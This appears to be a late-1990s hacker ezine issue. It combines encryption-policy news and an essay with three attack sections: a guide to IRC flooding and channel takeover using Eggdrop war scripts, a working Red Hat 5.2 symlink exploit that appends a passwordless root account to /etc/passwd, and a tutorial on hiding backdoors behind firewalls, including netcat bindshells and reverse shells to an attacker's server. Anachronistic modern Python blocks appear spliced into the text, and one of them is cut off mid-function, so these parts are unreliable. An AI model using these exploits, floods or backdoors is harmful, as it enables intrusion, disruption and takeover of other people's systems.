The bill would prohibit recovery agents from disclosing the keys or from using the keys to decrypt data except under certain circumstances, such as when a lawful heir of a deceased person wants decryption keys to the deceased's locked information. The draft bill also prohibits recovery agents from selling or revealing in any way their customer lists to other parties.

The new protections, however, are not strong enough to avoid the erosion of privacy rights, said David Sobel, general counsel for the Electronic Privacy Information Center, an advocacy group based in Washington, D.C. "It is not a pro-encryption proposal," he said. "The bottom line is: This is legislation that would increase law enforcement's ability to access encrypted data."

It also would serve to lay the legal groundwork for eventually outlawing encryption that does not have decryption keys available to law enforcement, Sobel said. "They could say, 'We have established legal procedures in place, they have been used in several cases. Now our problem is not everybody is using encryption that provides us with...access,' " he said.

Barbara Simons, president of the California-based Association for Computing Machinery, said the proposed bill bodes poorly for citizens' privacy. "Our lives are moving more and more online," she said. "There's always the risk that some future government or administration might compromise the rights and freedoms we enjoy today and take advantage of this technology." The proposed bill was not a surprise, she said, because FBI Director Louis Freeh "has been pushing to have access keys for a long time."

Fred Smith, an attorney in Santa Fe, N.M., who works as a special prosecutor in computer cases, said he does not believe the administration's motives are nefarious. "I really believe that there's a serious and good faith concern about what we're going to do if encryption takes off the way it appears to be taking off at the moment," he said.
A spokesman for DOJ described the proposal as "pending" and declined to comment on it.

One Capitol Hill staffer had some concerns. "I think they are really trying to hobble how people use encryption," said Ellen Stroud, spokeswoman for Rep. Bob Goodlatte (R-Va.), sponsor of the Security and Freedom through Encryption Act, which would relax controls on the export of encryption and prohibit the government from requiring a backdoor into people's e-mail and computer files.

Stroud said law enforcement officials examining electronic files as they pursue criminals in cyberspace could accidentally modify or destroy a company's legitimate files. "[The proposal] doesn't provide the needed protection for companies using encryption," she said. "You're putting yourself at greater liability [if you use a third-party firm to keep encryption keys.] It's easier for somebody to search you."

Stroud also said owners of information searched during a criminal investigation will not necessarily know what information law enforcement officials have been examining because the draft bill would allow law enforcement officials in some cases to delay issuing notice of the search warrant.

"If you want information from me, come to me and get it," Stroud said. "Why go to somewhere else? Why go to my neighbor? If you have a problem, hit it straight on."

@HWA

04.0 The lost art of IRC warfare using eggdrop bots
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

I found this while looking for a country script for a certain bot on a certain channel and found it pretty informative...so its here for you to peruse and perhaps learn a thing or two from the 'other' side of IRC. - Ed

IRC WAR
~~~~~~~~

Fighting with, and against, the Eggdrop Bot!
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

By Stormking

The properly configured Eggdrop bot is one of the most powerful IRC war machines, able to flood, icmp, nuke, and easily takeover channels. It is also damn near impossible to kill!
On this page I will try to teach you a few of the tricks of configuring and using the Eggdrop Warbot. By itself Eggdrop is little more than a tough irc client. The heart of the warbot is in the various tcl scripts designed to wreak havoc on IRC! I'll tell you what they are, where to get them, and how to set them up for maximum damage.

First, let's make sure yer bot's protection is set up properly. Eggdrop flood protection is set in the config file, way down in the "###MORE ADVANCED STUFF###" section. Here's an example from a 1.1.4 bot:

# how many msgs in how many seconds from the same host constitutes a flood?
set flood-msg 5:60
# how many public msgs in how many seconds?
set flood-chan 10:60
# how many joins/nick changes in how many seconds?
set flood-join 5:60
# how many CTCPs in how many seconds?
set flood-ctcp 3:60

You can change these to yer liking but I find that the defaults work just fine in most cases. Some bot masters run an extra tcl for protection such as ctcpprot but I've rarely had a bot flud off with the defaults. If you feel you need extra protection, its there.

Fighting With Eggdrop

So you got a new bot and you want to be a badass? Well, its easy enough to do. After you have yer bot's protection squared away, you'll need a few tcl scripts to help you on yer way. I don't have the server space to offer all the available war tcls but you can get most any of them at ftp://ftp.sodre.net/pub/eggdrop/ in the appropriate scripts section for yer bot version. Here's a list of some of my favorites:

- icmp tcl            Fabulous, if yer shell supports ping
- Chantoolz           Has its own floods too. For 1.0x
- takeover.tcl        Self explanatory. For 1.0x
- massmode1.1a.tcl    1.1x takeover script
- mjoin.tcl           A mass join script for botnets
- flud501e.tcl        1.0x fludnet scripts. Rox their asses!
- flud501f-oc.tcl     501e modified for 1.1x bots
- Wardrop.tcl         Most everything combined into one script!
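The flood-protection settings quoted above all have the same shape, "count:seconds" per source host, and the defensive side of this article is exactly that threshold logic. The following is an added example, not Eggdrop code and not part of Stormking's text: a sliding-window detector that evaluates those four thresholds against a constructed stream of IRC events. The event stream, host masks and the convention that a count of 0 disables a check are assumptions for the demonstration; Eggdrop's real implementation is not on the page.

```python
"""Sliding-window flood detection in the style of Eggdrop's N:M thresholds.

Added example, not Eggdrop's own code. It models only the rule the config
comments describe: N events from one host within M seconds is a flood.
The event stream below is constructed for the demonstration.
"""
from collections import defaultdict, deque

# Same "count:seconds" strings as the config excerpt above.
THRESHOLDS = {
    "msg":  "5:60",   # private msgs from one host
    "chan": "10:60",  # public msgs to the channel
    "join": "5:60",   # joins / nick changes
    "ctcp": "3:60",   # CTCP requests
}


def parse_threshold(spec):
    """'5:60' -> (5, 60). A count of 0 disables the check (assumed convention)."""
    count, seconds = spec.split(":")
    return int(count), int(seconds)


class FloodDetector:
    """Per-(kind, host) timestamp windows; reports the event that overflows one."""

    def __init__(self, thresholds):
        self.limits = {k: parse_threshold(v) for k, v in thresholds.items()}
        self.windows = defaultdict(deque)   # (kind, host) -> timestamps in window
        self.flagged = set()                # (kind, host) pairs already reported

    def event(self, ts, kind, host):
        """Record one event; return True the first time (kind, host) floods."""
        count, seconds = self.limits[kind]
        if count == 0:
            return False
        window = self.windows[(kind, host)]
        window.append(ts)
        # Evict timestamps that have aged out of the M-second window.
        while window and ts - window[0] >= seconds:
            window.popleft()
        if len(window) >= count and (kind, host) not in self.flagged:
            self.flagged.add((kind, host))
            return True
        return False


def scan(events, thresholds=THRESHOLDS):
    """Run (ts, kind, host) events through the detector; return the flood hits."""
    det = FloodDetector(thresholds)
    return [(ts, kind, host) for ts, kind, host in events
            if det.event(ts, kind, host)]


# Constructed stream, ordered by time. k1d sends 5 msgs in 5 seconds (a msg
# flood at 5:60); bob sends 4 CTCPs over 130 seconds, never 3 inside 60 s.
SAMPLE_EVENTS = [
    (100, "ctcp", "bob@shell.example"),
    (100, "msg",  "k1d@dialup.example"),
    (101, "msg",  "k1d@dialup.example"),
    (102, "msg",  "k1d@dialup.example"),
    (103, "msg",  "k1d@dialup.example"),
    (104, "msg",  "k1d@dialup.example"),   # 5th msg within 60 s -> flood
    (140, "ctcp", "bob@shell.example"),    # window: 100, 140
    (170, "ctcp", "bob@shell.example"),    # 100 aged out; window: 140, 170
    (230, "ctcp", "bob@shell.example"),    # 140 and 170 aged out; window: 230
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_EVENTS):
        print("flood from %s (%s) at t=%d" % (hit[2], hit[1], hit[0]))
```

The eviction uses `>=`, so an event exactly M seconds old no longer counts; the same host is reported once per kind rather than on every further message, which is what you want if the action is a ban or ignore rather than a log line.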
There are also a few advanced Unix war programs like "botnuke", "ssping", and "pepsi" but they require root access so almost no one can use them. If you have root access, you likely don't need me to tell you how to play war on Unix! The same goes for the fabled "spoofers", if you have them, you know how to use them.

OK, now that we have them, how do we use them? Well, most have their own help files. Use them. Anytime you are planning on loading a script you should always open it in an editor to see if there is anything you need to set before loading it. Now's a good time to look the script over for the basic commands, and the help commands! For example, the help file in takeover.tcl is accessed with the command ".thelp". This is a typical usage. Sometimes there are settings for which user flag will be required to use the tcl. Most default to +m but you can change that. My recommendation is to leave it as +m or even +n. Don't let all yer users access your bot's war stuff unless you want problems with opers.

Let's talk a little about icmp.tcl. This script rox, if you can use it. Unfortunately most shells don't allow ping or allow only very limited pinging. It's easy to find out if you got lucky.... Just load the script, no editing needed for the test. In dcc type ".set icmp 1". Now get someone's dns addy (the numeric one, do "/dns nick" in mIRC) and type ".icmp addy", putting the dns addy instead of the word "addy" of course.... Your bot will do one of several things. Most likely it will say "Sorry, this shell does not support ping". If it does, yer s.o.l., unload the script. It might, however, say "now icmp flooding". If it floods, watch yer victim (or use yer own dns for the test) and see if he poofs. If he drops off within a few minutes you are one of the lucky ones! If not, your ping is limited to a useless level. The help file for icmp.tcl is "icmp".

Another kewl script is mjoin.tcl. It's a botnet mass join/part script.
Its usage is real simple, just load it and type ".mjoin #channel". Every bot on yer net which is running this script will join that channel. Use ".mpart #channel" to get them out. This script can be loads of fun but use it carefully as some people don't care for their bots being jerked into strange channels. Those people, of course, shouldn't run this tcl but some do......

The king of the Eggdrop war scripts is flud.tcl, available in various versions. The ones I prefer are available above. Use 501e for 1.0x bots and 501f for 1.1x. 501e comes complete with 2 versions, a standard -oc version and a +oc version. The +oc (stands for oper-check) will check the victim before fludding and abort fluds on opers, a damn good idea! There is a bit more to this tcl, both in setup and use, than most of the others. To get started open the tcl in any editor EXCEPT PICO (pico doesn't like long lines). You will see these settings at the top:

# set flag1 "e"        ;# Flag suggested for fludflag.
set fludword "flud"    ;# Word to use for fluding
set fludflag "m"       ;# Flag required for fluding.
set fludver "501-e"    ;# Flud Version. DON'T Change(I'll kill you if you do)!
set fludmax 10         ;# Max times to flud.
set fluddef 5          ;# Default flud times.
set fludnap 45         ;# Leave this at 45 to keep the net in synch!
set fludnet "EFnet"    ;# Net you are on.
set fludact 1          ;# Flud on or off? (0/1)
set ircnick ""         ;# Define your IRC nickname here. EXTREME PROTECTION!
set fludnick 0         ;# Change to 1 to Enable Nick Changes during fludz.

The first one, #set flag1 "e", you have to uncomment if you want to use it. It gives users a separate flag if they are allowed to flud. I never use this, I just leave the fludflag at "m", allowing any master to flud. The only settings you might need to change here are the fludnet, ircnick, and fludnick. Fludnet, obviously, should be set to the network yer bot is on. Ircnick allows 1.0x bots to have a different nick on the botnet and on irc, a good idea in my opinion.
1.1x allows you to set "botnet nick" in the config file so its not needed here. Fludnick is an interesting feature, very useful but somewhat annoying. It changes yer bot's nick during fluds to a random nick, such as SJYT233, then changes it back again after the flud. This can save you from k-lines when the victim sends his log to an oper but can be a bitch in a busy channel. I always set fludnick 1. All my bots flud and I have very few k-lines. It's up to you!

OK, once you have these things set its time to learn how to use flud. The help file for flud.tcl is ".fludhelp". You will need it. There are many types of fluds available, each useful in certain situations. The basic syntax for fluds is ".flud <nick> <# of times> <type of flud>". In other words, ".flud butthead 10 15" would flud butthead 10 times with a type 15 flud, a "Boom" echo flud. Always use 10 for the number of lines as most fludbots are set for a maximum of 10. If my victim is a standard mIRC client I like to start with the Boom flud. If there are above 30 fludbots available he will usually drop. If he doesn't drop, he may be running an advanced mIRC script and be basically un-fludable. Against bots I use a "4" or clientinfo flud. Sometimes it works. Another kewl flud is the "22" or privmsg flud. This one opens a bunch of little chat windows on yer victims screen. Not very effective but annoying as hell! Experiment, find yer own favorites. A few other useful commands are ".fludbots", which tells you how many bots will flud, and ".last" which tells who made the last flud. Set yer console to +5 to see flud results and progress.

Always remember the main rule of fludding, do a /whois on yer victim before fludding. DO NOT EVER flud irc operators. To do so risks not only yer own bots but all fludbots on the net. Most botnets will kick you off for fludding an oper. Remember this. You have been warned.
Fighting Against Eggdrop

Since Eggdrops are UNIX processes they are invincible to standard nuking and such things as will easily kill a Windoze client. A strong icmp, such as from a T3, will kill a bot but that's about it. This assumes, of course, that yer bot is on a solid shell (Win-Eggs are NOT included). I've also had limited success with an old DOS based proggie called Flash. Most Eggdrops don't blink at this but a few will drop. It's worth a try if you need to kill an Eggdrop. If you have a good fludnet behind you (say 50 or more fludbots) you can sometimes drop an Egg with a standard flud. I find that clientinfo fluds (usually flud type 4) work best against Eggdrops. Again, most won't blink but a few will fall. You can also try a good nuker set for non-standard protocols like "host unreachable". If these things don't work yer likely stuck with waiting and hoping the bot's shell goes down so you can jump in the channel and quickly kill the other users, grabbing ops before the bot returns.

In Conclusion

Many people nowadays say things like "IRC war is lame" or "the days of IRC war are over". Well, lame it may be, but dead it certainly isn't. I am a firm believer in peace on Earth, and on IRC, but I also believe that peace is best maintained, in both cases, through superior firepower.
@HWA

05.0 Finally a working redhat 5.2 local exploit - From BlackBox issue #1
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

by icesk

#!/bin/sh
# Symlink race: point /tmp/.font-unix at /etc/passwd, then wait for a
# privileged process to make that path writable. Once the symlink target
# is writable to us, append a uid 0 account and log in as it.
HAPPY_FILE="/etc/passwd"
MAGIC_FILE="/tmp/.font-unix"
MAGIC_USER="1C3SK"
LOGIN=`which login`

ln -s $HAPPY_FILE $MAGIC_FILE
echo "made symlink;" `ls -l $MAGIC_FILE`

# poll until the real file behind the symlink becomes writable
while true; do
  sleep 2
  if [ -w $HAPPY_FILE ]; then
    # user:password:uid:gid:gecos:home:shell (empty password, uid/gid 0)
    echo $MAGIC_USER"::0:0::/:/bin/sh"
    echo $MAGIC_USER"::0:0::/:/bin/sh" >> $HAPPY_FILE
    $LOGIN $MAGIC_USER
    exit
  fi
done

@HWA

06.0 The state of crypto today
~~~~~~~~~~~~~~~~~~~~~~~~~

From http://www.hackernews.com/
contributed by Brian Oblivion

Cyberspace Electronic Security Act, CALEA, OECD, The Wassenaar Arrangement, SAFE, HR-2616, S798, HR-2617, UCITA, and on and on and on. Just what the hell is going on? The government wants crypto controls and the public doesn't.

Buffer Overflow
http://www.hackernews.com/orig/buffero.html

The State of Crypto Policy Today: If you have nothing to hide...

By: Brian Oblivion
L0pht Heavy Industries

The World remains forever changed by the promise of international telecommunications. For the past 3 decades we have enjoyed an ever growing communications explosion providing a mechanism for the free flow of information internationally. With early communications systems, Governments could easily setup listening posts on international links before exiting the country via undersea cable or satellite uplinks. Prior to the mid-1980's the resources to protect communications via cryptography were cost prohibitive and physically constraining.

Privacy is power, therefore it must be regulated.

Today, the proliferation of high-performance, low-power, low-cost micro-processors have opened the door to build cryptographic protection into all communication systems. This would render existing governmental listening outposts obsolete. We know this is true, due to the scrambling at hand on curtailing the proliferation of strong encryption systems and software.
The intelligence communities have noticed a sharp increase in encrypted traffic across the communications networks of the world. This originally prompted the US (United States) to advertise the use of Key Escrow/Recovery encryption, where the keys used to protect information would be stored by a trusted third party. Later, a key could "lawfully" be obtained to decrypt stored files or communications in real-time once protected by that key.

International and domestic opposition to Key escrow/recovery systems has seemed to triumph in Europe and most of the world. The OECD (Organization for Economic Cooperation and Development), a Paris-based international body of 29 countries, resisted lobbying by the US Department of Justice, FBI and NSA to endorse key escrow/recovery systems. The European Union is a staunch opponent to Key Escrow regimes and is presently removing inter-union restrictions on encryption products, leading the way for other countries to adopt privacy focused strategies.

In addition to OECD, The Wassenaar Arrangement, a 32 country body, sets export controls for conventional weapons and sensitive dual-use goods and technologies. The US successfully lobbies this organization, and uses it to assert its crypto policy on an international scale. The bulk of the restrictions on dual-use goods and technologies are uncannily similar to those which are promulgated by the United States. Recently the Arrangement increased export restrictions on encryption products with 64-bit or greater key sizes. In light of this new restriction, many countries have voiced their opposition to this change in policy and plan on not adopting the new restriction. While no country is bound by any of these agreements, they are encouraged to adopt the guidelines set forth by these bodies. When countries fail to adequately interpret the guidelines to be in line with US interpretation, diplomatic consultation results.
Recently Janet Reno, US Attorney General, wrote the chancellor of Germany's Federal Secretary of Justice to restrict the distribution of "public domain" encryption products. It can be surmised that the position of the US is to petition others to remove all public domain encryption software from distribution servers currently on the Internet.

As a direct result of this international collaboration of encryption policy, the US has recently published its policy on encryption usage, as House Resolution HR-2616. The policy is mostly well founded, and while still not relaxing encryption export controls on encryption bit lengths over 64-bit, it still allows US Citizens to use any encryption they should choose without mandating key escrow mechanisms.

" ...it shall be lawful for any person within any State and for any United States person to use any encryption product, regardless of encryption algorithm selected, encryption bit length chosen, or implementation technique or medium used."

Hopefully the public at large will act responsibly with encryption technology. As with the current view of firearms, this freedom is likely to be short lived. Nowhere in the document does it discuss the ramifications of keeping keys in tamper-responsive hardware. Nor does it discuss the ramifications of reverse-engineering cryptographic implementations. It can be read that as long as you do not decrypt someone's communications or medium without their consent you are exempt from the laws referenced therein. There is also exclusion for encryption products and services which are used solely for access control, digital signatures, authentication or similar purposes. This does allow the decryption of passwords, and the like for security auditing and other such practices. However, Government encryption use is called to use escrowed cryptography, as well as are government contractors engaged in contract work for the government.
This is actually more of a blessing than an impediment, where the government at least will have to continue to operate responsibly. The provision still exists where all investigations thwarted by the use of encryption will be recorded by the Attorney General, and maintained in classified form. The results of these findings will undoubtedly sway future addendums to the current policy toward encryption.

The Security and Freedom through Encryption Act (SAFE), once a very liberating legislative initiative, has since come under attack by law enforcement and the intelligence community. The original goal of SAFE was to relax all exportation restrictions regardless of encryption key length. However, the restrictions are now back in the Act, with exceptions for key lengths of 64 bits or less. All other encryption software must first be subject to governmental review before permission can be granted for export. The export restriction on key length is to be set by a newly formed Encryption Export Advisory board, which shall be comprised of a chairman under the Secretary of Commerce for Export Administration. Seven other individuals appointed by the President representative of the NSA, CIA, the Office of the President, and four from the private sector who have expertise in the information security field. The board is to report to the president every 30 days on what encryption technology is suitable for export. The president can still override any recommendation they may come up with.

The SAFE act continues prohibition on Federal or State governmental mandated key escrow systems. A provision stating that encrypted communications alone is not "probable cause" to obtain a search warrant to request the cleartext of said communications is a big win for privacy advocates. It blocks a blanket probable cause to eavesdrop on all communications, once the majority of traffic is encrypted. There are some extra penalties for using encryption to hide "criminal" activity.
One can realize that this may become immaterial once it becomes the exception to not encrypt your communications channels or your storage mediums. Especially as the trend for hidden and low level crypto systems is on the rise. Another disturbing attribute is the mandatory, one-time 15-day technical review of your algorithms/equipment with the Secretary of Commerce. There are some specific restrictions for equipment which can be used for military or intelligence end use, or which may be used for terrorist organizations. It would seem that the definition of what can be construed as such equipment can be quite broad and applied to almost all encryption technologies.

As with the US Crypto Policy house resolution, a committee to research buggered prosecutions due to the employment of encryption technologies, is to be established. The database will be 'classified', and accessible by appropriate law enforcement agencies. The results of this investigation will undoubtedly be used as a case to repeal the prohibition of mandated key escrow systems or a change in export policies. This bill has been introduced into the senate as the PROTECT Act of 1999, S798 IS.

Money is power, therefore we are Taxed.

HR 2617, "To amend the Internal Revenue Code of 1986 to allow a tax credit for development costs of encryption products with plaintext capability without the user's knowledge."

There is a move in Congress (HR 2617) to alter the existing tax law to allow corporations which develop and implement encryption technologies a tax deduction. This tax deduction is not a reward for a high level of security, but rather, if the system has the capability of escrowing keys used in the system. In order for this strategy to work, taxes would continue to rise, thereby aiding those who conform to . The legitimate basis for this Resolution may be to stimulate development to support the US Governments own request for Key escrowed/recovery systems for its use.
Privacy is privilege, therefore communications are supervised.

To further understand the commitment the US Government has on domestic intelligence dominance, the Communications Assistance for Law Enforcement ACT (CALEA), which will provide law enforcement agencies cleartext or clearvoice in near real-time without the endusers knowledge, is clearing hurdle after hurdle. CALEA was once opposed by the telecommunications industry, but now that the Federal Government has removed the monetary burden, from industry to the government, almost all dissension has been quelled. Performing such a wiretap is permitted only by a court order. But with all new technology, remote capabilities and ease of use will undoubtedly provide some risk of unauthorized monitoring of otherwise private communications. Another possibility is during emergency war powers or some other crisis, the inconvenience of obtaining a court order to perform a wiretap could be waived by a predatorial government, resulting in broad, undetectable eavesdropping capabilities. To thwart such activity, personal encryption technology will still be required to circumvent the buggered, state sponsored systems.

Knowledge is power, therefore it must be controlled.

In the US, The National Conference of Commissioners for Uniform State Laws (NCCUSL) has approved and adopted the Uniform Computer Information Transactions Act (UCITA). While this document has been criticized publicly by Attorney Generals from various states, some of the flaws are detrimental to security applications and condone poor programming practices. Even after cryptographic algorithms are verified to be relatively secure at a certain point in time, the implementation of the overall system utilizing the algorithm can be flawed. One must push software's bounds of normal operations to flesh out any potentially revealing error conditions. Using software outside of its intended use is considered a breach of contract, and prohibited by the UCITA.
There are also stipulations for publicly posting criticizing statements against faulty software. As security groups have proven, many times security holes are only addressed once widebanded to a software company's peers and customers. Cryptographic implementations must be allowed public scrutiny and analysis by one's peers. An implementation steeped in secrecy is usually flawed and obfuscated to prevent the revelation of such flaws. Removing the service of independent analysis will degrade the overall state of security in the industry, leaving the holes in the hands of mandatory federal reviewers.

As we move into the next millennium the topic of encryption will continue to strike up heated debate between Intelligence Communities and liberty advocates. The world is mostly comfortable to give up its privacy for a little security. This is usually done in comfortable political climates. Should that climate ever change, we will have given Government the keys to our lives, and the ability to keep its interests above and beyond the will of its subjects. The cryptographic debate boils down to: the ability to communicate without the fear of government intrusion, or the possibility for all of your communications to be intercepted by an uninvited third party.

If you have nothing to hide...

OECD Cryptography Policy
http://www.oecd.org/dsti/sti/it/secur/prod/e-crypto.htm

Cryptography and Liberty 1999
http://www2.epic.org/reports/crypto1999.html

UCITA
http://www.law.upenn.edu/bll/ulc/ucita/citam99.htm

EPIC Cryptographic Policy Review
http://www.epic.org/crypto

@HWA

07.0 Using a backdoor in a firewalled system
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

[ http://www.rootshell.com/ ]

-------------------------[ Placing Backdoors Through Firewalls

--------[ van Hauser / THC

----[ Introduction

This article describes possible backdoors through different firewall architectures. However, the material can also be applied to other environments to describe how hackers (you?)
cover their access to a system.

Hackers often want to retain access to systems they have penetrated even in the face of obstacles such as new firewalls and patched vulnerabilities. To accomplish this the attackers must install a backdoor which a) does its job and b) is not easily detectable. The kind of backdoor needed depends on the firewall architecture used. As a gimmick and proof-of-concept, a nice backdoor for any kind of intrusion is included, so have fun.

----[ Firewall Architectures

There are two basic firewall architectures and each has an enhanced version.

Packet Filters:
This is a host or router which checks each packet against an allow/deny ruletable before routing it through the correct interface. There are very simple ones which can only filter from the origin host, destination host and destination port, as well as good ones which can also decide based on incoming interface, source port, day/time and some tcp or ip flags. This could be a simple router, f.e. any Cisco, or a Linux machine with firewalling activated (ipfwadm).

Stateful Filters:
This is the enhanced version of a packet filter. It still does the same checking against a rule table and only routes if permitted, but it also keeps track of the state information such as TCP sequence numbers. Some pay attention to application protocols which allows tricks such as only opening ports to the interior network for ftp-data channels which were specified in a permitted ftp session. These filters can (more or less) get UDP packets (f.e. for DNS and RPC) securely through the firewall. (That's because UDP is a stateless protocol. And it's more difficult for RPC services.) This could be a great OpenBSD machine with the ip-filter software, a Cisco Pix, Watchguard, or the (in)famous Checkpoint FW-1.

Proxies / Circuit Level Gateways:
A proxy as a firewall host is simply any server which has no routing activated and instead has proxy software installed.
Examples of proxy servers which may be used are squid for WWW, a sendmail relay configuration and/or just a sockd.

Application Gateways:
  This is the enhanced version of a proxy. Like a proxy, for every application which should get through the firewall a piece of software must be installed and running to proxy it. However, the application gateway is smart and checks every request and answer, e.g. that an outgoing ftp may only download data but not upload any, that the data carries no virus, that no buffer overflows are generated in answers, etc. One can argue that squid is an application gateway, because it does many sanity checks and lets you filter stuff, but it was not programmed for installation in a secure environment and still has/had security bugs. A good example of a freeware kit of this kind is the TIS firewall toolkit (fwtk).

Most firewalls that vendors sell on the market are hybrid firewalls, which means they've got more than just one type implemented; for example the IBM Firewall is a simple packet filter with socks and a few proxies. I won't discuss which firewall product is the best, because this is not a how-to-buy-a-firewall paper, but I will say this: application gateways are by far the most secure firewalls, although money, speed, special protocols, open network policies, stupidity, marketing hype and bad management might rule them out.

----[ Getting in

Before we talk about which backdoors are the best for which firewall architecture we should shed some light on how to get through a firewall the first time. Note that getting through a firewall is not a plug-n-play thing for script-kiddies; this has to be carefully planned and done.

The main possibilities:

Insider:
  There's someone inside the company (you, girlfriend, chummer) who installs the backdoor. This is the easiest way of course.

Vulnerable Services:
  Nearly all networks offer some kind of services, such as incoming email, WWW, or DNS.
These may be on the firewall host itself, a host in the DMZ (here: the zone in front of the firewall, often not protected by a firewall) or on an internal machine. If an attacker can find a hole in one of those services, he's got a good chance to get in. You'd laugh if you saw how many "firewalls" run sendmail for mail relaying ...

Vulnerable External Server:
  People behind a firewall sometimes work on external machines. If an attacker can hack these, he can cause serious mischief, such as the many X attacks if the victim uses it via an X relay or sshd. The attacker could also send fake ftp answers to overflow a buffer in the ftp client software, or replace a gif picture on a web server with one which crashes netscape and executes a command (I never checked if this actually works; it crashes, yeah, but I didn't look through this to see if it is really an exploitable overflow). There are many possibilities with this but it needs some knowledge about the company. However, an external web server of the company is usually a good start. Some firewalls are configured to allow incoming telnet from some machines, so anyone can sniff these and get in. This is particularly true for the US, where academic environments and industry/military work closely together.

Hijacking Connections:
  Many companies think that if they allow incoming telnet with some kind of secure authentication like SecurID (secure algo?, heh) they are safe. Anyone can hijack these after the authentication and get in ... Another way of using hijacked connections is to modify replies in the protocol implementation to generate a buffer overflow (e.g. with X).

Trojans:
  Many things can be done with a trojan horse. This could be a gzip file which generates a buffer overflow (well, needs an old gzip to be installed), a tar file which tampers with e.g. ~/.logout to execute something, or an executable or source code which was modified to get the hacker in somehow.
To get someone to run this, mail spoofing could be used, or replacing the originals on an external server which internal employees access to update their software regularly (ftp xfer files and www logs can be checked to find out which files these are).

----[ Placing the Backdoors

An intelligent hacker will not try to put the backdoors on machines in the firewall segment, because these machines are usually monitored and checked regularly. It's the internal machines which are usually unprotected and without much administration and security checks.

I will now talk about some ideas for backdoors which could be implemented. Note that programs which will/would work through a stateful filter will of course work with a normal packet filter too, and the same goes for the proxy. Ideas for an application gateway backdoor will work for any architecture. Some of them are "active" and others "passive". "Active" backdoors are those which can be used by a hacker anytime he wishes; a "passive" one triggers itself by time/event, so an attacker has to wait for this to happen.

Packet Filters:
  It's hard to find a backdoor which gets through this one but does not work for any other. The few ones which come to mind are:
  a) the ack-telnet. It works like a normal telnet/telnetd except it does not use the normal TCP handshake/protocol but uses TCP ACK packets only. Because they look like they belong to an already established (and allowed) connection, they are permitted. This can be easily coded with the spoofit.h of Coder's Spoofit project (http://reptile.rug.ac.be/~coder).
  b) Loki from Phrack 49/51 could be used too, to establish a tunnel with ICMP echo/reply packets. But some coding would need to be done.
  c) daemonshell-udp is a backdoor shell via UDP (http://r3wt.base.org, look for thc-uht1.tgz).
  d) Last but not least, most "firewall systems" with only a screening router/firewall let any incoming TCP connection from source port 20 to a high port (>1023) through, to allow the (non-passive) ftp protocol to work. "netcat -p 20 target port-of-bindshell" is the fastest solution for this one.

Stateful Filters:
  Here a hacker must use programs which initiate the connection from the secure network to his external 0wned server. There are many out there which could be used:
  active: tunnel from Phrack 52. ssh with the -R option (much better than tunnel ... it's a legitimate program on a computer and it encrypts the data stream).
  passive: netcat compiled with the execute option and run with a time option to connect to the hacker's machine (ftp.avian.org). reverse_shell from the thc-uht1.tgz package does the same.

Proxies / Circuit Level Gateways:
  If socks is used on the firewall, someone can use all that stuff from the stateful filter section and "socksify" it (www.socks.nec.com). For more advanced tools you should take a look at the application gateway section.

Application Gateways:
  Now we get down to the interesting stuff. These beasts can be intelligent, so some brain is needed.
  active:
    (re-)placing a cgi-script on the webserver of the company, which allows remote access. This is unlikely, because it's rare that the webserver is in the internal network, not monitored/checked/audited, and accessible from the internet. I hope nobody needs an example of such a thing ;-)
    (re-)placing a service/binary on the firewall. This is dangerous because those are audited regularly and sometimes even sniffed permanently ...
    Loading a loadable module into the firewall kernel which hides itself and gives access to its master. The best solution for an active backdoor but still dangerous.
  passive:
    E@mail - an email account/mailer/reader is configured in a way to extract hidden commands from an email (X-Headers with weird stuff) and send them back with output if wanted/needed.
    WWW - this is hard stuff. A daemon on an internal machine does http requests to the internet, but the requests are in reality the answers to commands which were issued by a rogue www server in an http reply. This nice and easy beast is presented below (-> Backdoor Example: The Reverse WWW Shell).
    DNS - same concept as above but with DNS queries and replies. The disadvantage is that it can not carry much data. (http://www.icon.co.za/~wosp/wosp.dns-tunnel.tar.gz; this example still needs much coding to be effective.)

----[ Backdoor Example: The Reverse WWW Shell

This backdoor should work through any firewall which has got the security policy to allow users to surf the WWW (World Wide Waste) for information for the sake and profit of the company. For a better understanding take a look at the following picture and try to remember it onwards in the text:

   +--------+                    +------------+                +-------------+
   |internal|--------------------|  FIREWALL  |----------------|server owned |
   |  host  |  internal network  +------------+    internet    |by the hacker|
   +--------+                                                   +-------------+
     SLAVE                                                          MASTER

Well, a program is run on the internal host, which spawns a child every day at a special time. To the firewall, this child looks like a user using his netscape client to surf the internet. In reality, this child executes a local shell and connects to the www server owned by the hacker on the internet via a legitimate-looking http request, and sends its ready signal. The legitimate-looking answers of the www server owned by the hacker are in reality the commands the child will execute on its machine in the local shell. All traffic is converted (I'll not call this "encrypted", I'm not Micro$oft) into a Base64-like structure and given as the value of a cgi string, which also prevents caching.
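The "Base64-like" conversion described above is a fixed, reversible substitution, not encryption: anyone holding the table reads the traffic. The following Python is an added example by the editor, not part of van Hauser's article or of rwwwshell itself; it mirrors the uuencode/uudecode subroutines of rwwwshell.pl in the THE CODE section (shared token, uuencode, then a swap of uuencode's URL-hostile characters for lowercase letters) so that a defender can decode a captured request line the same way the MASTER does. The token and cgi prefix are the script's defaults; the request contents are constructed; it assumes Python 3.7 or later for binascii's backtick option.

```python
"""Codec for rwwwshell's HTTP-request transport (added example, not THC code).

Re-implements the uuencode()/uudecode() subs of rwwwshell.pl: shell data is
prefixed with a shared token, uuencoded, and the URL-hostile characters that
uuencode emits are swapped for lowercase letters (which uuencode never uses).
The table is fixed, so a defender with one captured request can decode it.
"""
import binascii
from typing import Optional

PASSWORD = "THC"                  # $PASSWORD from the script's default config
CGI_PREFIX = "/cgi-bin/order?"    # $CGI_PREFIX from the script's default config

# Perl: tr/'\n)=(:;&><,#$*%]!\@"`\\\-'/'zcadefghjklmnopqrstuv'/ then tr/'/b/
# (the two tr's are folded into one table here: the quote goes straight to 'b')
UNSAFE_CHARS = "'\n)=(:;&><,#$*%]!@\"`\\-"
SAFE_CHARS = "bzcadefghjklmnopqrstuv"
assert len(UNSAFE_CHARS) == len(SAFE_CHARS) == 22
_TO_SAFE = str.maketrans(UNSAFE_CHARS, SAFE_CHARS)
_FROM_SAFE = str.maketrans(SAFE_CHARS, UNSAFE_CHARS)


def encode_raw(data: bytes) -> str:
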